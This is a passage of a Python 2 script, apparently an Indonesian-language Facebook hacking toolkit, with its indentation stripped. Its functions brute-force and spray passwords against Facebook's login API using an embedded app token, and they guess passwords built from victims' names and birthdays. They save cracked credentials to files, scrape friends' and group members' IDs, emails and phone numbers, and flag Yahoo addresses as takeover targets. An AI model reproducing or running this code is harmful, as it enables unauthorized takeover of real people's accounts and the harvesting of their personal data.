print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Sorry, opening password target failed :('
print '\x1b[1;91m[!] Try other method.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Connection busy'
time.sleep(0.01)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
def hasil():
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Crack from Friends'
print '║-> \x1b[1;37;40m2. Crack from Group'
print '║-> \x1b[1;37;40m3. Crack from File'
print '║-> \x1b[1;31;40m0. Kembali'
print '\x1b[1;37;40m║'
pilih_super()
def pilih_super():
peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '3':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
pass2 = b['firs_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + ['name']
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
pass4 = b['last_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
birthday = b['birthday']
pass5 = birthday.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
pass6 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.5)
login()
else:
os.system('clear')
print logo
print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mKamu ingin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. From Friends'
print '║-> \x1b[1;37;40m2. From File'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
yahoo_pilih()
def yahoo_pilih():
go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Can\'t empty'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak Ditemukan'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token Tidak Ada'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(friends.text)
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mSimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Get ID From Friends'
print '║-> \x1b[1;37;40m2. Get Friends ID From Friends'
print '║-> \x1b[1;37;40m3. Get ID From GRUP'
print '║-> \x1b[1;37;40m4. Get Friends Email'
print '║-> \x1b[1;37;40m5. Get Friends Email From Friends'
print '║-> \x1b[1;37;40m6. Get Phone From Friends'
print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
grab_pilih()
def grab_pilih():
cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Can\'t empty'
grab_pilih()
else:
if cuih == '1':
id_friends()
else:
if cuih == '2':
idfrom_friends()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_friends()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_friends()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found'
grab_pilih()
def id_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def idfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def emailfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
